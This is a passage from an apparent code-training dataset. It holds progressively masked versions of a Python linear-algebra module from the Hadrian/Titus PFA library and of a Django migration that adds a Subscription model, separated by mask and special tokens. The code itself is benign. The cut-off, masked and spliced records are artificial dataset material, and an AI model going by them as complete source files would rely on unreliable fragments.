else 1.0)) for\n i in range(size)]\n eigvalm2 = [div(1.0, math.sqrt(abs(ei))) for ei in evals]\n order = np().argsort(eigvalm2)\n out = np().empty((size, size), dtype=np().double)\n for i in range(size):\n for j in range(size):\n out[i, j] = evects2[order[i]][j] * eigvalm2[order[i]]\n return out\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n if rows != cols:\n raise PFARuntimeException('non-square matrix', self.\n errcodeBase + 2, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in row) for row in\n x):\n raise PFARuntimeException('non-finite matrix', self.\n errcodeBase + 3, self.name, pos)\n return matrixToArrays(self.calculate(arraysToMatrix(x), rows))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = list(rowKeys(x).union(colKeys(x)))\n if len(keys) < 1 or all(len(z) == 0 for z in list(x.values())):\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in list(row.\n values())) for row in list(x.values())):\n raise PFARuntimeException('non-finite matrix', self.\n errcodeBase + 3, self.name, pos)\n return matrixToMaps(self.calculate(mapsToMatrix(x, keys, keys),\n len(keys)), list(map(str, range(len(keys)))), keys)\n\n\n<mask token>\n\n\nclass Truncate(LibFcn):\n name = prefix + 'truncate'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'keep': P.Int()}\n ], P.Array(P.Array(P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()\n ))}, {'keep': P.Array(P.String())}], 
P.Map(P.Map(P.Double())))])\n errcodeBase = 24120\n\n def __call__(self, state, scope, pos, paramTypes, x, keep):\n if isinstance(keep, int) and keep < 0:\n keep = 0\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return x[:keep]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n rows = rowKeys(x)\n cols = colKeys(x)\n if len(rows) < 1 or len(cols) < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n return dict((k, x[k]) for k in rows if k in keep)\n\n\n<mask token>\n",
"step-5": "#!/usr/bin/env python\n\n# Copyright (C) 2014 Open Data (\"Open Data\" refers to\n# one or more of the following companies: Open Data Partners LLC,\n# Open Data Research LLC, or Open Data Capital LLC.)\n# \n# This file is part of Hadrian.\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport math\n\nfrom titus.fcn import Fcn\nfrom titus.fcn import LibFcn\nfrom titus.signature import Sig\nfrom titus.signature import Sigs\nfrom titus.datatype import *\nfrom titus.errors import *\nfrom titus.util import callfcn, div\nimport titus.P as P\nfrom functools import reduce\n\nprovides = {}\ndef provide(fcn):\n provides[fcn.name] = fcn\n\nprefix = \"la.\"\n\ndef np():\n import numpy\n return numpy\n\ndef rowKeys(x):\n return set(x.keys())\n\ndef colKeys(x):\n if len(x) == 0:\n return set()\n else:\n return reduce(lambda a, b: a.union(b), [set(xi.keys()) for xi in list(x.values())])\n\ndef arraysToMatrix(x):\n return np().matrix(x, dtype=np().double)\n\ndef arrayToRowVector(x):\n return np().matrix(x, dtype=np().double).T\n\ndef rowVectorToArray(x):\n return x.T.tolist()[0]\n\ndef matrixToArrays(x):\n return x.tolist()\n\ndef mapsToMatrix(x, rows, cols):\n return np().matrix([[x.get(i, {}).get(j, 0.0) for j in cols] for i in rows], dtype=np().double)\n\ndef mapToRowVector(x, keys):\n return np().matrix([x.get(k, 0.0) for k in keys], dtype=np().double).T\n\ndef rowVectorToMap(x, keys):\n return dict(list(zip(keys, x.T.tolist()[0])))\n\ndef matrixToMaps(x, rows, 
cols):\n return dict((row, dict(list(zip(cols, xi)))) for row, xi in zip(rows, x.tolist()))\n\ndef raggedArray(x):\n collens = list(map(len, x))\n return max(collens) != min(collens)\n\ndef raggedMap(x):\n return len(set(len(xi) for xi in list(x.values()))) != 1\n\nclass MapApply(LibFcn):\n name = prefix + \"map\"\n sig = Sigs([Sig([{\"x\": P.Array(P.Array(P.Double()))}, {\"fcn\": P.Fcn([P.Double()], P.Double())}], P.Array(P.Array(P.Double()))),\n Sig([{\"x\": P.Map(P.Map(P.Double()))}, {\"fcn\": P.Fcn([P.Double()], P.Double())}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24000\n def __call__(self, state, scope, pos, paramTypes, x, fcn):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):\n return [[callfcn(state, scope, fcn, [xj]) for xj in xi] for xi in x]\n\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):\n return dict((i, dict((j, callfcn(state, scope, fcn, [xj])) for j, xj in list(xi.items()))) for i, xi in list(x.items()))\n\nprovide(MapApply())\n\nclass Scale(LibFcn):\n name = prefix + \"scale\"\n sig = Sigs([Sig([{\"x\": P.Array(P.Double())}, {\"alpha\": P.Double()}], P.Array(P.Double())),\n Sig([{\"x\": P.Array(P.Array(P.Double()))}, {\"alpha\": P.Double()}], P.Array(P.Array(P.Double()))),\n Sig([{\"x\": P.Map(P.Double())}, {\"alpha\": P.Double()}], P.Map(P.Double())),\n Sig([{\"x\": P.Map(P.Map(P.Double()))}, {\"alpha\": P.Double()}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24010\n def __call__(self, state, scope, pos, paramTypes, x, alpha):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):\n return [[xj * alpha for xj in xi] for xi in x]\n elif isinstance(x, (list, tuple)):\n return [xi * alpha for xi in x]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in x):\n return dict((i, dict((j, xj * alpha) for j, xj in list(xi.items()))) for i, xi in list(x.items()))\n else:\n return dict((i, xi * alpha) for i, xi in 
list(x.items()))\n\nprovide(Scale())\n\nclass ZipMap(LibFcn):\n name = prefix + \"zipmap\"\n sig = Sigs([Sig([{\"x\": P.Array(P.Array(P.Double()))}, {\"y\": P.Array(P.Array(P.Double()))}, {\"fcn\": P.Fcn([P.Double(), P.Double()], P.Double())}], P.Array(P.Array(P.Double()))),\n Sig([{\"x\": P.Map(P.Map(P.Double()))}, {\"y\": P.Map(P.Map(P.Double()))}, {\"fcn\": P.Fcn([P.Double(), P.Double()], P.Double())}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24020\n def __call__(self, state, scope, pos, paramTypes, x, y, fcn):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x) and \\\n isinstance(y, (list, tuple)) and all(isinstance(yi, (list, tuple)) for yi in y):\n if len(x) != len(y) or any(len(xi) != len(yi) for xi, yi in zip(x, y)):\n raise PFARuntimeException(\"misaligned matrices\", self.errcodeBase + 0, self.name, pos)\n return [[callfcn(state, scope, fcn, [xj, yj]) for xj, yj in zip(xi, yi)] for xi, yi in zip(x, y)]\n\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())) and \\\n isinstance(y, dict) and all(isinstance(y[i], dict) for i in list(y.keys())):\n rows = rowKeys(x).union(rowKeys(y))\n cols = colKeys(x).union(colKeys(y))\n return dict((i, dict((j, callfcn(state, scope, fcn, [x.get(i, {}).get(j, 0.0), y.get(i, {}).get(j, 0.0)])) for j in cols)) for i in rows)\n\nprovide(ZipMap())\n\nclass Add(LibFcn):\n name = prefix + \"add\"\n sig = Sigs([Sig([{\"x\": P.Array(P.Double())}, {\"y\": P.Array(P.Double())}], P.Array(P.Double())),\n Sig([{\"x\": P.Array(P.Array(P.Double()))}, {\"y\": P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),\n Sig([{\"x\": P.Map(P.Double())}, {\"y\": P.Map(P.Double())}], P.Map(P.Double())),\n Sig([{\"x\": P.Map(P.Map(P.Double()))}, {\"y\": P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24030\n def __call__(self, state, scope, pos, paramTypes, x, y):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x) and 
\\\n isinstance(y, (list, tuple)) and all(isinstance(yi, (list, tuple)) for yi in y):\n if len(x) != len(y) or any(len(xi) != len(yi) for xi, yi in zip(x, y)):\n raise PFARuntimeException(\"misaligned matrices\", self.errcodeBase + 0, self.name, pos)\n return [[xj + yj for xj, yj in zip(xi, yi)] for xi, yi in zip(x, y)]\n\n elif isinstance(x, (list, tuple)) and isinstance(y, (list, tuple)):\n if len(x) != len(y):\n raise PFARuntimeException(\"misaligned matrices\", self.errcodeBase + 0, self.name, pos)\n return [xi + yi for xi, yi in zip(x, y)]\n\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())) and \\\n isinstance(y, dict) and all(isinstance(y[i], dict) for i in list(y.keys())):\n rows = rowKeys(x).union(rowKeys(y))\n cols = colKeys(x).union(colKeys(y))\n return dict((i, dict((j, x.get(i, {}).get(j, 0.0) + y.get(i, {}).get(j, 0.0)) for j in cols)) for i in rows)\n\n else:\n rows = rowKeys(x).union(rowKeys(y))\n return dict((i, x.get(i, 0.0) + y.get(i, 0.0)) for i in rows)\n\nprovide(Add())\n\nclass Sub(LibFcn):\n name = prefix + \"sub\"\n sig = Sigs([Sig([{\"x\": P.Array(P.Double())}, {\"y\": P.Array(P.Double())}], P.Array(P.Double())),\n Sig([{\"x\": P.Array(P.Array(P.Double()))}, {\"y\": P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),\n Sig([{\"x\": P.Map(P.Double())}, {\"y\": P.Map(P.Double())}], P.Map(P.Double())),\n Sig([{\"x\": P.Map(P.Map(P.Double()))}, {\"y\": P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24040\n def __call__(self, state, scope, pos, paramTypes, x, y):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x) and \\\n isinstance(y, (list, tuple)) and all(isinstance(yi, (list, tuple)) for yi in y):\n if len(x) != len(y) or any(len(xi) != len(yi) for xi, yi in zip(x, y)):\n raise PFARuntimeException(\"misaligned matrices\", self.errcodeBase + 0, self.name, pos)\n return [[xj - yj for xj, yj in zip(xi, yi)] for xi, yi in zip(x, y)]\n\n elif 
isinstance(x, (list, tuple)) and isinstance(y, (list, tuple)):\n if len(x) != len(y):\n raise PFARuntimeException(\"misaligned matrices\", self.errcodeBase + 0, self.name, pos)\n return [xi - yi for xi, yi in zip(x, y)]\n\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())) and \\\n isinstance(y, dict) and all(isinstance(y[i], dict) for i in list(y.keys())):\n rows = rowKeys(x).union(rowKeys(y))\n cols = colKeys(x).union(colKeys(y))\n return dict((i, dict((j, x.get(i, {}).get(j, 0.0) - y.get(i, {}).get(j, 0.0)) for j in cols)) for i in rows)\n\n else:\n rows = rowKeys(x).union(rowKeys(y))\n return dict((i, x.get(i, 0.0) - y.get(i, 0.0)) for i in rows)\n\nprovide(Sub())\n\nclass Dot(LibFcn):\n name = prefix + \"dot\"\n sig = Sigs([Sig([{\"x\": P.Array(P.Array(P.Double()))}, {\"y\": P.Array(P.Double())}], P.Array(P.Double())),\n Sig([{\"x\": P.Map(P.Map(P.Double()))}, {\"y\": P.Map(P.Double())}], P.Map(P.Double())),\n Sig([{\"x\": P.Array(P.Array(P.Double()))}, {\"y\": P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),\n Sig([{\"x\": P.Map(P.Map(P.Double()))}, {\"y\": P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24050\n def __call__(self, state, scope, pos, paramTypes, x, y):\n if paramTypes[1][\"type\"] == \"array\":\n if isinstance(paramTypes[1][\"items\"], dict) and paramTypes[1][\"items\"][\"type\"] == \"array\":\n # array matrix-matrix case\n bad = any(any(math.isnan(z) or math.isinf(z) for z in row) for row in x) or \\\n any(any(math.isnan(z) or math.isinf(z) for z in row) for row in y)\n xmat = arraysToMatrix(x)\n ymat = arraysToMatrix(y)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 1, self.name, pos)\n try:\n if bad: raise PFARuntimeException(\"contains non-finite value\", self.errcodeBase + 2, self.name, pos)\n return matrixToArrays(np().dot(xmat, ymat))\n except ValueError:\n 
raise PFARuntimeException(\"misaligned matrices\", self.errcodeBase + 0, self.name, pos)\n\n else:\n # array matrix-vector case\n bad = any(any(math.isnan(z) or math.isinf(z) for z in row) for row in x) or \\\n any(math.isnan(z) or math.isinf(z) for z in y)\n xmat = arraysToMatrix(x)\n ymat = arrayToRowVector(y)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 1, self.name, pos)\n try:\n if bad: raise PFARuntimeException(\"contains non-finite value\", self.errcodeBase + 2, self.name, pos)\n return rowVectorToArray(np().dot(xmat, ymat))\n except ValueError:\n raise PFARuntimeException(\"misaligned matrices\", self.errcodeBase + 0, self.name, pos)\n\n elif paramTypes[1][\"type\"] == \"map\":\n if isinstance(paramTypes[1][\"values\"], dict) and paramTypes[1][\"values\"][\"type\"] == \"map\":\n # map matrix-matrix case\n bad = any(any(math.isnan(z) or math.isinf(z) for z in list(row.values())) for row in list(x.values())) or \\\n any(any(math.isnan(z) or math.isinf(z) for z in list(row.values())) for row in list(y.values()))\n rows = list(rowKeys(x))\n inter = list(colKeys(x).union(rowKeys(y)))\n cols = list(colKeys(y))\n xmat = mapsToMatrix(x, rows, inter)\n ymat = mapsToMatrix(y, inter, cols)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 1, self.name, pos)\n if bad: raise PFARuntimeException(\"contains non-finite value\", self.errcodeBase + 2, self.name, pos)\n return matrixToMaps(np().dot(xmat, ymat), rows, cols)\n\n else:\n # map matrix-vector case\n bad = any(any(math.isnan(z) or math.isinf(z) for z in list(row.values())) for row in list(x.values())) or \\\n any(math.isnan(z) or math.isinf(z) for z in list(y.values()))\n rows = list(rowKeys(x))\n cols = list(colKeys(x).union(rowKeys(y)))\n xmat = mapsToMatrix(x, rows, cols)\n ymat = 
mapToRowVector(y, cols)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 1, self.name, pos)\n if bad: raise PFARuntimeException(\"contains non-finite value\", self.errcodeBase + 2, self.name, pos)\n return rowVectorToMap(np().dot(xmat, ymat), rows)\n\nprovide(Dot())\n \nclass Transpose(LibFcn):\n name = prefix + \"transpose\"\n sig = Sigs([Sig([{\"x\": P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),\n Sig([{\"x\": P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24060\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException(\"ragged columns\", self.errcodeBase + 1, self.name, pos)\n return [[x[r][c] for r in range(rows)] for c in range(cols)]\n\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):\n rows = rowKeys(x)\n cols = colKeys(x)\n if len(rows) < 1 or len(cols) < 1:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n if raggedMap(x):\n raise PFARuntimeException(\"ragged columns\", self.errcodeBase + 1, self.name, pos)\n return dict((c, dict((r, x[r][c]) for r in rows)) for c in cols)\n\nprovide(Transpose())\n\nclass Inverse(LibFcn):\n name = prefix + \"inverse\"\n sig = Sigs([Sig([{\"x\": P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),\n Sig([{\"x\": P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24070\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi 
in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException(\"ragged columns\", self.errcodeBase + 1, self.name, pos)\n return matrixToArrays(arraysToMatrix(x).I)\n\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):\n rows = list(rowKeys(x))\n cols = list(colKeys(x))\n if len(rows) < 1 or len(cols) < 1:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n xmat = mapsToMatrix(x, rows, cols)\n return matrixToMaps(xmat.I, cols, rows)\n\nprovide(Inverse())\n\nclass Trace(LibFcn):\n name = prefix + \"trace\"\n sig = Sigs([Sig([{\"x\": P.Array(P.Array(P.Double()))}], P.Double()),\n Sig([{\"x\": P.Map(P.Map(P.Double()))}], P.Double())])\n errcodeBase = 24080\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):\n rows = len(x)\n if rows == 0:\n return 0.0\n else:\n cols = len(x[0])\n if raggedArray(x):\n raise PFARuntimeException(\"ragged columns\", self.errcodeBase + 0, self.name, pos)\n return sum(x[i][i] for i in range(min(rows, cols)))\n\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):\n keys = rowKeys(x).intersection(colKeys(x))\n return sum(x[i][i] for i in keys)\n\nprovide(Trace())\n\nclass Det(LibFcn):\n name = prefix + \"det\"\n sig = Sigs([Sig([{\"x\": P.Array(P.Array(P.Double()))}], P.Double()),\n Sig([{\"x\": P.Map(P.Map(P.Double()))}], P.Double())])\n errcodeBase = 24090\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n cols 
= len(x[0])\n if cols < 1:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException(\"ragged columns\", self.errcodeBase + 1, self.name, pos)\n if rows != cols:\n raise PFARuntimeException(\"non-square matrix\", self.errcodeBase + 2, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in row) for row in x):\n return float(\"nan\")\n else:\n return float(np().linalg.det(arraysToMatrix(x)))\n\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):\n keys = list(rowKeys(x).union(colKeys(x)))\n if len(keys) < 1 or all(len(row) == 0 for row in list(x.values())):\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in list(row.values())) for row in list(x.values())):\n return float(\"nan\")\n else:\n return float(np().linalg.det(mapsToMatrix(x, keys, keys)))\n\nprovide(Det())\n\nclass Symmetric(LibFcn):\n name = prefix + \"symmetric\"\n sig = Sigs([Sig([{\"x\": P.Array(P.Array(P.Double()))}, {\"tol\": P.Double()}], P.Boolean()),\n Sig([{\"x\": P.Map(P.Map(P.Double()))}, {\"tol\": P.Double()}], P.Boolean())])\n errcodeBase = 24100\n @staticmethod\n def same(x, y, tol):\n if math.isinf(x) and math.isinf(y) and ((x > 0.0 and y > 0.0) or (x < 0.0 and y < 0.0)):\n return True\n elif math.isnan(x) and math.isnan(y):\n return True\n elif not math.isinf(x) and not math.isnan(x) and not math.isinf(y) and not math.isnan(y):\n return abs(x - y) < tol\n else:\n return False\n def __call__(self, state, scope, pos, paramTypes, x, tol):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n if 
raggedArray(x):\n raise PFARuntimeException(\"ragged columns\", self.errcodeBase + 1, self.name, pos)\n if rows != cols:\n raise PFARuntimeException(\"non-square matrix\", self.errcodeBase + 2, self.name, pos)\n return all(all(self.same(x[i][j], x[j][i], tol) for j in range(cols)) for i in range(rows))\n\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):\n keys = list(rowKeys(x).union(colKeys(x)))\n if len(keys) < 1 or all(len(row) == 0 for row in list(x.values())):\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n return all(all(self.same(x.get(i, {}).get(j, 0.0), x.get(j, {}).get(i, 0.0), tol) for j in keys) for i in keys)\n\nprovide(Symmetric())\n\nclass EigenBasis(LibFcn):\n name = prefix + \"eigenBasis\"\n sig = Sigs([Sig([{\"x\": P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),\n Sig([{\"x\": P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])\n\n errcodeBase = 24110\n def calculate(self, x, size):\n symm = (x + x.T) * 0.5\n\n evals, evects = np().linalg.eig(symm)\n evects = np().array(evects)\n evects2 = [evects[:,i] * (-1.0 if evects[0,i] < 0.0 else 1.0) for i in range(size)]\n\n eigvalm2 = [div(1.0, math.sqrt(abs(ei))) for ei in evals]\n order = np().argsort(eigvalm2)\n\n out = np().empty((size, size), dtype=np().double)\n for i in range(size):\n for j in range(size):\n out[i,j] = evects2[order[i]][j] * eigvalm2[order[i]]\n return out\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException(\"ragged columns\", self.errcodeBase + 1, self.name, pos)\n if rows != cols:\n raise 
PFARuntimeException(\"non-square matrix\", self.errcodeBase + 2, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in row) for row in x):\n raise PFARuntimeException(\"non-finite matrix\", self.errcodeBase + 3, self.name, pos)\n return matrixToArrays(self.calculate(arraysToMatrix(x), rows))\n\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):\n keys = list(rowKeys(x).union(colKeys(x)))\n if len(keys) < 1 or all(len(z) == 0 for z in list(x.values())):\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in list(row.values())) for row in list(x.values())):\n raise PFARuntimeException(\"non-finite matrix\", self.errcodeBase + 3, self.name, pos)\n return matrixToMaps(self.calculate(mapsToMatrix(x, keys, keys), len(keys)), list(map(str, range(len(keys)))), keys)\n\nprovide(EigenBasis())\n\nclass Truncate(LibFcn):\n name = prefix + \"truncate\"\n sig = Sigs([Sig([{\"x\": P.Array(P.Array(P.Double()))}, {\"keep\": P.Int()}], P.Array(P.Array(P.Double()))),\n Sig([{\"x\": P.Map(P.Map(P.Double()))}, {\"keep\": P.Array(P.String())}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24120\n def __call__(self, state, scope, pos, paramTypes, x, keep):\n if isinstance(keep, int) and keep < 0:\n keep = 0\n\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException(\"ragged columns\", self.errcodeBase + 1, self.name, pos)\n return x[:keep]\n\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):\n rows = rowKeys(x)\n cols = colKeys(x)\n if len(rows) < 1 or len(cols) < 1:\n raise PFARuntimeException(\"too few 
rows/cols\", self.errcodeBase + 0, self.name, pos)\n return dict((k, x[k]) for k in rows if k in keep)\n\nprovide(Truncate())\n",
"step-ids": [
26,
42,
47,
53,
59
]
}
|
[
26,
42,
47,
53,
59
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('users', '0003_delete_userprofile')]
operations = [migrations.CreateModel(name='Subscription', fields=[('id',
models.AutoField(auto_created=True, primary_key=True, serialize=
False, verbose_name='ID')), ('email', models.EmailField(max_length=
255)), ('subscribe_to', models.CharField(choices=[('jobs', 'Jobs'),
('posts', 'Posts'), ('newsletter', 'Newsletter')], max_length=100)),
('department', modelcluster.fields.ParentalKey(null=True, on_delete
=django.db.models.deletion.CASCADE, related_name=
'department_subscriptions', to='users.Department'))], options={
'verbose_name': 'Subscription', 'verbose_name_plural':
'Subscriptions'})]
<|reserved_special_token_1|>
from django.db import migrations, models
import django.db.models.deletion
import modelcluster.fields
class Migration(migrations.Migration):
dependencies = [('users', '0003_delete_userprofile')]
operations = [migrations.CreateModel(name='Subscription', fields=[('id',
models.AutoField(auto_created=True, primary_key=True, serialize=
False, verbose_name='ID')), ('email', models.EmailField(max_length=
255)), ('subscribe_to', models.CharField(choices=[('jobs', 'Jobs'),
('posts', 'Posts'), ('newsletter', 'Newsletter')], max_length=100)),
('department', modelcluster.fields.ParentalKey(null=True, on_delete
=django.db.models.deletion.CASCADE, related_name=
'department_subscriptions', to='users.Department'))], options={
'verbose_name': 'Subscription', 'verbose_name_plural':
'Subscriptions'})]
<|reserved_special_token_1|>
# Generated by Django 2.2.2 on 2019-07-17 10:02
from django.db import migrations, models
import django.db.models.deletion
import modelcluster.fields
class Migration(migrations.Migration):
dependencies = [
('users', '0003_delete_userprofile'),
]
operations = [
migrations.CreateModel(
name='Subscription',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('email', models.EmailField(max_length=255)),
('subscribe_to', models.CharField(choices=[('jobs', 'Jobs'), ('posts', 'Posts'), ('newsletter', 'Newsletter')], max_length=100)),
('department', modelcluster.fields.ParentalKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='department_subscriptions', to='users.Department')),
],
options={
'verbose_name': 'Subscription',
'verbose_name_plural': 'Subscriptions',
},
),
]
|
flexible
|
{
"blob_id": "cf2c57dbb2c1160321bcd6de98691db48634d5d6",
"index": 5388,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('users', '0003_delete_userprofile')]\n operations = [migrations.CreateModel(name='Subscription', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('email', models.EmailField(max_length=\n 255)), ('subscribe_to', models.CharField(choices=[('jobs', 'Jobs'),\n ('posts', 'Posts'), ('newsletter', 'Newsletter')], max_length=100)),\n ('department', modelcluster.fields.ParentalKey(null=True, on_delete\n =django.db.models.deletion.CASCADE, related_name=\n 'department_subscriptions', to='users.Department'))], options={\n 'verbose_name': 'Subscription', 'verbose_name_plural':\n 'Subscriptions'})]\n",
